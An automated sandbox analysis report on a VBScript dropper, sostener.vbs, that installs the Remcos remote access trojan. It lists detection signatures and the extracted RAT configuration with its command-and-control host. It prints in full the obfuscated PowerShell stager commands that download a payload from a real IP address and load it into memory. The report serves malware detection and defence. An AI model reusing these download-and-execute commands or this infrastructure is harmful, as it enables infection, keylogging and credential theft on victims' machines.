
Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name: sostener.vbs
Analysis ID: 1559185
MD5: 619077e3c8387532a2d930e2b86c9ff7
SHA1: 081166adc2aed980d757c61687838f53ecaf4224
SHA256: 3c313c19ce509197f848990ef3837d2fdf55ed5d9eb2ddf2f1cd9f35e41bd664
Tags: opendir, vbs, user-Joker

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Potential dropper URLs found in powershell memory
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3644 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?H
Q?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7240 cmdline: "C:\Windows\system32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • PING.EXE (PID: 7308 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 7396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 7536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["remcosnov24.duckdns.org:4576:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0883UG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Dropped files
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\registros.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Memory dumps
Source | Rule | Description | Author | Strings
0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
Unpacked PEs
Source | Rule | Description | Author | Strings
15.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
15.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
15.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
15.2.AddInProcess32.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
15.2.AddInProcess32.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]

System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4
?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;,
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 
'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) 